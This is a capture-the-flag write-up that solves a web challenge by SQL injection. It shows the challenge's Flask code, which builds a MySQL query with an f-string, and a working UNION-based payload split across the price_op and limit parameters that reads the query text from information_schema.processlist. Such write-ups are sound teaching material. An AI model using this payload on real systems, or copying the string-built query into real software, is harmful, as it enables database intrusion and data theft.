Can you attack the menu system to read the flag that is in a comment inside the query itself? (source provided as dist.tar.gz) Note: This is the first in a series of 3 challenges https://limited-app-974780027560.us-east5.run.app/
from here, we can already infer that this is an SQL Injection. So I immediately moved on to analyzing the attached files. The first file I checked was initialize.sql:
1
2
3
4
5
6
-- The actual name of this table in the host challenge starts with Flag_ but is unguessable.
CREATETABLEFlag_REDACTED(valueVARCHAR(255)NOTNULL);INSERTINTOFlag_REDACTED(value)VALUES('wctf{redacted-flag}');
apparently, a flag is located in the Flag_* table (meaning we need to enumerate the tables), as this is a series of 3 challenges. Then, analyzing app.py, I found the vulnerable code snippet and also where the flag for this challenge is located:
@app.route('/query')defquery():try:price=float(request.args.get('price')or'0.00')except:price=0.0price_op=str(request.args.get('price_op')or'>')ifnotre.match(r' ?(=|<|<=|<>|>=|>) ?',price_op):return'price_op must be one of =, <, <=, <>, >=, or > (with an optional space on either side)',400# allow for at most one space on either side iflen(price_op)>4:return'price_op too long',400# I'm pretty sure the LIMIT clause cannot be used for an injection # with MySQL 9.x # # This attack works in v5.5 but not later versions # https://lightless.me/archives/111.html limit=str(request.args.get('limit')or'1')query=f"""SELECT /*{FLAG1}*/category, name, price, description FROM Menu WHERE price {price_op}{price} ORDER BY 1 LIMIT {limit}"""print('query:',query)
as we can see, the flag is inserted inside a comment within the query itself! Obviously, since all the other parameters are validated, our injection will go into the limit parameter. Let’s move on to the exploitation phase.
🔬 Vulnerability Analysis
Potential Vulnerabilities
SQL Injection
🎯 Solution Path
Exploitation Steps
Initial setup
Since the query output is limited to 4, a Union Based SQL Injection with 4 columns will be required.
Exploitation
After several attempts, I constructed the following payload:
1
https://limited-app-974780027560.us-east5.run.app/query?price=10.00&price_op=< /*&limit=*/ 0 UNION SELECT 1, (SELECT info FROM information_schema.processlist WHERE id = CONNECTION_ID()), 3, 4 --
The reason I can extract the comment is that the SQL injection manipulates the comment delimiters. Normally, the flag is placed inside a comment (using /*{FLAG1}*/) and would neither be executed nor displayed. But with the parameters:
"price_op": "< /*"
"limit": "*/ 0 UNION SELECT 1, (SELECT info FROM information_schema.processlist WHERE id = CONNECTION_ID()), 3, 4 -- "
the comment is closed prematurely. In other words, the price_op parameter opens a new comment (with /*), and then the limit parameter closes it (with */), separating the part containing the flag and making it part of the query output (via the UNION). This way, the comment that contained the flag becomes part of the returned string, allowing the attacker to extract it using regex.
Flag capture
Manual Flag
🛠️ Exploitation Process
Approach
The automatic exploit sends a GET request with the previously mentioned payload and extracts the flag from the response using a regex.
